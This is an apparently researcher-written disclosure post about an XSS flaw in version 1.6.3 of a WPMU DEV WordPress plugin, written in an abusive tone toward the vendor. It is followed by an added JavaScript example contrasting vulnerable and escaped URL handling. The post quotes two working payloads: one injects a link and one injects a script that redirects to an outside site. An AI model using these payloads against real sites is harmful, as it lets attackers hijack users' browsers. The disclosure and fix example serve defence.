XSS vulnerability in 1.6.3
Since this has been fixed, I’ll publish here the report I sent to WPMU DEV so everyone can see it and choose if they want to keep using WPMU DEV’s plugins.
I was going to post this in www.remarpro.com support forum, but I don’t want to f**k your users because of your incompetence. I’ll give you 24 hours to update your plugin before full disclosure.
Just another bug in your code, and this is a big one.
Enter one of the URLs below as the image URL, click the preview button and enjoy your XSS:
https://thisisnotamalicious.url"><a href=https://google.com>Click this innocent link! I swear it is safe!</a> <!--
Or just redirect to a malicious page without user interaction (change 7 to 8 if you are using https):
https://thisisnotamalicious.url"><script>var x = String(/google.com/);x = x.substring(1, x.length-1);y = location.href;window.location.replace(y.substring(0, 7) + x)</script>
Nice job, WPMU DEV. How many years with an XSS vulnerability?
This vulnerability allowed an attacker to execute arbitrary code in the client’s browser just by using a URL similar to the ones I described above. This is a very basic but very dangerous attack and it should have been fixed several years ago.
I guess this vulnerability affects every single version from 1.6.3 to the first one, but I only tested it in 1.6.3.
UPDATE NOW!
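The class of bug reported above, shown next to a hardened form. This is an added example, not part of the original post and not the plugin's code; it assumes the preview places the image URL inside an `img` `src` attribute, and all function names are hypothetical.

```javascript
// Added example: hypothetical names, not the plugin's own code.

// Constructed sample input: the first URL quoted in the report above.
const REPORTED_INPUT =
  'https://thisisnotamalicious.url"><a href=https://google.com>' +
  'Click this innocent link! I swear it is safe!</a> <!--';

// Vulnerable pattern (assumed): user input concatenated into an attribute.
// A double quote in the input closes src="..." and the rest becomes markup.
function renderPreviewUnsafe(imageUrl) {
  return '<img src="' + imageUrl + '" alt="preview">';
}

// Escape every character that can end an attribute value or open a tag.
function escapeAttr(value) {
  const map = { '&': '&amp;', '"': '&quot;', "'": '&#39;', '<': '&lt;', '>': '&gt;' };
  return String(value).replace(/[&"'<>]/g, (ch) => map[ch]);
}

// Accept only absolute http(s) URLs and return the parser's normalized form.
function safeImageUrl(input) {
  let url;
  try {
    url = new URL(String(input).trim());
  } catch (err) {
    return null; // not parseable as an absolute URL
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}

// Hardened preview: validate first, then escape at the point of output.
function renderPreview(imageUrl) {
  const href = safeImageUrl(imageUrl);
  if (href === null) return '<p>Invalid image URL</p>';
  return '<img src="' + escapeAttr(href) + '" alt="preview">';
}

console.log(renderPreviewUnsafe(REPORTED_INPUT)); // injected <a> survives
console.log(renderPreview(REPORTED_INPUT));       // no injected markup
console.log(renderPreview('https://example.test/i.png?a=1&b=2'));
```

Validation and escaping are separate layers here: the URL check rejects input that is not an http(s) URL, and the attribute escaping still applies to whatever passes it.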